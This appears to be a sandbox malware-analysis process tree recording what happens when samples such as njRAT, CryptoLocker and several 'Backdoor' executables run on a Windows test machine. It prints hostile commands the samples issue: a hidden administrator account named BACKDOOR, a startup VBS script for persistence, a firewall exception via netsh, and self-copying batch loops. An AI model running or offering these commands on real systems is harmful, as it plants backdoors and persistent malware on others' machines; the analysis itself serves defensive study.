C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,5121404395520247639,2563978353101033770,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9780 /prefetch:12⤵PID:7416
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,5121404395520247639,2563978353101033770,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9840 /prefetch:12⤵PID:6716
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,5121404395520247639,2563978353101033770,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9812 /prefetch:12⤵PID:1160
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,5121404395520247639,2563978353101033770,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10232 /prefetch:12⤵PID:8276
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,5121404395520247639,2563978353101033770,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10164 /prefetch:12⤵PID:8908
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,5121404395520247639,2563978353101033770,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10504 /prefetch:12⤵PID:9000
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,5121404395520247639,2563978353101033770,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8712 /prefetch:12⤵PID:6024
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,5121404395520247639,2563978353101033770,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8724 /prefetch:12⤵PID:6988
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1588
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:2104
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:2520
-
C:\Users\Admin\Downloads\malware-master\malware-master\NJRAT\njRAT 0.7d\NjRAT 0.7d.exe"C:\Users\Admin\Downloads\malware-master\malware-master\NJRAT\njRAT 0.7d\NjRAT 0.7d.exe"1⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:2800 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\M.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\M.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:3944 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c echo on error resume next:CreateObject("WScript.Shell").Run "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\M.exe",1: >"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs"3⤵
- Drops startup file
- System Location Discovery: System Language Discovery
PID:3872
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\M.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\M.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3728 -
C:\Users\Admin\AppData\Roaming\server.exe"C:\Users\Admin\AppData\Roaming\server.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:1436 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c echo on error resume next:CreateObject("WScript.Shell").Run "C:\Users\Admin\AppData\Roaming\server.exe",1: >"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs"5⤵
- Drops startup file
- System Location Discovery: System Language Discovery
PID:4172
-
-
C:\Users\Admin\AppData\Roaming\server.exeC:\Users\Admin\AppData\Roaming\server.exe5⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:4888 -
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\server.exe" "server.exe" ENABLE6⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4716
-
-
-
-
-
-
C:\Users\Admin\Downloads\malware-master\malware-master\DarkHorse VM\DarkHorseTrojanVirusMaker.exe"C:\Users\Admin\Downloads\malware-master\malware-master\DarkHorse VM\DarkHorseTrojanVirusMaker.exe"1⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5108
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k UnistackSvcGroup1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1484
-
C:\Users\Admin\Downloads\malware-master\malware-master\CryptoLocker 2014\1002.exe"C:\Users\Admin\Downloads\malware-master\malware-master\CryptoLocker 2014\1002.exe"1⤵
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
PID:964 -
C:\Users\Admin\AppData\Roaming\A4C3D1C6E1.exe"C:\Users\Admin\AppData\Roaming\A4C3D1C6E1.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
PID:1528
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill" /F /IM 1002.exe2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4344
-
-
C:\Users\Admin\Downloads\malware-master\malware-master\CryptoLocker 2014\1003.exe"C:\Users\Admin\Downloads\malware-master\malware-master\CryptoLocker 2014\1003.exe"1⤵
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
PID:4596
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Drops startup file
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SendNotifyMessage
PID:516
-
C:\Users\Admin\Downloads\malware-master\malware-master\Backdoor\Backdoor.exe"C:\Users\Admin\Downloads\malware-master\malware-master\Backdoor\Backdoor.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:4736 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\E1F0.tmp\E1F1.bat C:\Users\Admin\Downloads\malware-master\malware-master\Backdoor\Backdoor.exe"2⤵PID:3084
-
C:\Windows\system32\net.exenet user BACKDOOR /ADD3⤵PID:4936
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user BACKDOOR /ADD4⤵PID:1420
-
-
-
C:\Windows\system32\net.exenet localgroup administrators BACKDOOR /add3⤵PID:4988
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup administrators BACKDOOR /add4⤵PID:2184
-
-
-
C:\Windows\system32\net.exenet user BACKDOOR /active:no3⤵PID:1664
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user BACKDOOR /active:no4⤵PID:4704
-
-
-
-
C:\Users\Admin\Downloads\malware-master\malware-master\Backdoor\Backdoor(np).exe"C:\Users\Admin\Downloads\malware-master\malware-master\Backdoor\Backdoor(np).exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:748 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\EE25.tmp\EE26.bat C:\Users\Admin\Downloads\malware-master\malware-master\Backdoor\Backdoor(np).exe"2⤵PID:3516
-
C:\Windows\system32\net.exenet user BACKDOOR/ADD3⤵PID:3436
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user BACKDOOR/ADD4⤵PID:4484
-
-
-
C:\Windows\system32\net.exenet localgroup administrators BACKDOOR /add3⤵PID:4048
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup administrators BACKDOOR /add4⤵PID:3592
-
-
-
C:\Windows\system32\net.exenet user BACKDOOR /active:no3⤵PID:4384
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user BACKDOOR /active:no4⤵PID:4032
-
-
-
-
C:\Users\Admin\Downloads\malware-master\malware-master\Backdoor\Backdoor(na).exe"C:\Users\Admin\Downloads\malware-master\malware-master\Backdoor\Backdoor(na).exe"1⤵
- System Location Discovery: System Language Discovery
PID:1568 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\F1DE.tmp\F1DF.bat C:\Users\Admin\Downloads\malware-master\malware-master\Backdoor\Backdoor(na).exe"2⤵PID:4496
-
C:\Windows\system32\net.exenet user BACKDOOR /ADD3⤵PID:1360
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user BACKDOOR /ADD4⤵PID:2852
-
-
-
C:\Windows\system32\net.exenet localgroup administrators BACKDOOR /add3⤵PID:2776
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup administrators BACKDOOR /add4⤵PID:3380
-
-
-
C:\Windows\system32\net.exenet user BACKDOOR /active:no3⤵PID:2752
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user BACKDOOR /active:no4⤵PID:4504
-
-
-
-
C:\Users\Admin\Downloads\malware-master\malware-master\Backdoor\Backdoor(na)(np).exe"C:\Users\Admin\Downloads\malware-master\malware-master\Backdoor\Backdoor(na)(np).exe"1⤵
- System Location Discovery: System Language Discovery
PID:228 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\F4EC.tmp\F4FC.bat C:\Users\Admin\Downloads\malware-master\malware-master\Backdoor\Backdoor(na)(np).exe"2⤵PID:4124
-
C:\Windows\system32\net.exenet user BACKDOOR/ADD3⤵PID:2248
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user BACKDOOR/ADD4⤵PID:4944
-
-
-
C:\Windows\system32\net.exenet localgroup administrators BACKDOOR /add3⤵PID:3396
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup administrators BACKDOOR /add4⤵PID:1228
-
-
-
C:\Windows\system32\net.exenet user BACKDOOR /active:no3⤵PID:3692
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user BACKDOOR /active:no4⤵PID:1656
-
-
-
-
C:\Users\Admin\Downloads\malware-master\malware-master\DELmE\DELmE_s Batch Virus Generator v 2.0.exe"C:\Users\Admin\Downloads\malware-master\malware-master\DELmE\DELmE_s Batch Virus Generator v 2.0.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:1872
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\malware-master\malware-master\Killsight\wordmacromalware.Killsight.txt1⤵PID:2104
-
C:\Users\Admin\Downloads\malware-master\malware-master\666\666.exe"C:\Users\Admin\Downloads\malware-master\malware-master\666\666.exe"1⤵
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:1800 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c @echo off2⤵
- System Location Discovery: System Language Discovery
PID:4916
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c dir c2⤵
- System Location Discovery: System Language Discovery
PID:3324
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c md VIRUS2⤵
- System Location Discovery: System Language Discovery
PID:5104
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/watch?v=t455k17_QAI2⤵PID:1768
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff84c2846f8,0x7ff84c284708,0x7ff84c2847183⤵PID:1364
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/watch?v=t455k17_QAI2⤵PID:5096
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x124,0x128,0x12c,0x100,0x130,0x7ff84c2846f8,0x7ff84c284708,0x7ff84c2847183⤵PID:4376
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/watch?v=t455k17_QAI2⤵PID:2268
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff84c2846f8,0x7ff84c284708,0x7ff84c2847183⤵PID:4564
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 11922⤵
- Program crash
PID:5552
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1880
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x2f0 0x3041⤵PID:5244
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1800 -ip 18001⤵PID:5536
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\nigga.bat" "1⤵PID:1436
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y "2⤵PID:6480
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_exe.txt) do copy /y "C:\Users\Admin\Downloads\nigga.bat" "%j:%k""2⤵PID:6472
-
-
C:\Users\Admin\Downloads\malware-master\malware-master\MasterSlave (test)\MasterSlave.exe"C:\Users\Admin\Downloads\malware-master\malware-master\MasterSlave (test)\MasterSlave.exe"1⤵
- System Location Discovery: System Language Discovery
PID:2796 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c @echo off2⤵
- System Location Discovery: System Language Discovery
PID:3692
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c dir c2⤵
- System Location Discovery: System Language Discovery
PID:2856
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c md VIRUS2⤵
- System Location Discovery: System Language Discovery
PID:5672
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/watch?v=kSS_tDfeLOk2⤵PID:5784
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff84c2846f8,0x7ff84c284708,0x7ff84c2847183⤵PID:5816
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c MasterSlave.exe2⤵
- System Location Discovery: System Language Discovery
PID:5812 -
C:\Users\Admin\Downloads\malware-master\malware-master\MasterSlave (test)\MasterSlave.exeMasterSlave.exe3⤵
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:5836 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c @echo off4⤵
- System Location Discovery: System Language Discovery
PID:2012
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c dir c4⤵
- System Location Discovery: System Language Discovery
PID:5900
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c md VIRUS4⤵
- System Location Discovery: System Language Discovery
PID:5936
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/watch?v=kSS_tDfeLOk4⤵PID:448
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff84c2846f8,0x7ff84c284708,0x7ff84c2847185⤵PID:4956
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c MasterSlave.exe4⤵
- System Location Discovery: System Language Discovery
PID:5632 -
C:\Users\Admin\Downloads\malware-master\malware-master\MasterSlave (test)\MasterSlave.exeMasterSlave.exe5⤵
- System Location Discovery: System Language Discovery
PID:5692 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c @echo off6⤵
- System Location Discovery: System Language Discovery
PID:5808
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c dir c6⤵
- System Location Discovery: System Language Discovery
PID:5904
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c md VIRUS6⤵
- System Location Discovery: System Language Discovery
PID:4948
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/watch?v=kSS_tDfeLOk6⤵PID:5928
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff84c2846f8,0x7ff84c284708,0x7ff84c2847187⤵PID:6072
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c MasterSlave.exe6⤵PID:1400
-
C:\Users\Admin\Downloads\malware-master\malware-master\MasterSlave (test)\MasterSlave.exeMasterSlave.exe7⤵PID:5720
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c @echo off8⤵PID:3904
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c dir c8⤵PID:1504
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c md VIRUS8⤵PID:3780
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/watch?v=kSS_tDfeLOk8⤵PID:404
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff84c2846f8,0x7ff84c284708,0x7ff84c2847189⤵PID:5652
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://thoughtcatalog.com/juliet-escoria/2013/12/16-steps-to-kill-someone-and-not-get-caught/8⤵PID:5504
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x120,0x124,0x128,0x11c,0xf8,0x7ff84c2846f8,0x7ff84c284708,0x7ff84c2847189⤵PID:2776
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.topgunsupply.com/sig-sauer-p226r-9mm-nitron-siglite-night-sights-da-sa.html8⤵PID:6476
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x120,0x124,0x128,0xf8,0x12c,0x7ff84c2846f8,0x7ff84c284708,0x7ff84c2847189⤵PID:6532
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.amazon.com/Disaster-Bag-Body/dp/B0012C9UGK8⤵PID:4228
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x128,0xf8,0x100,0x124,0x104,0x7ff84c2846f8,0x7ff84c284708,0x7ff84c2847189⤵PID:6288
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c MasterSlave.exe8⤵PID:5664
-
C:\Users\Admin\Downloads\malware-master\malware-master\MasterSlave (test)\MasterSlave.exeMasterSlave.exe9⤵PID:1720
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c @echo off10⤵PID:1724
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c dir c10⤵PID:6816
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c md VIRUS10⤵PID:6704
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/watch?v=kSS_tDfeLOk10⤵PID:6592
-
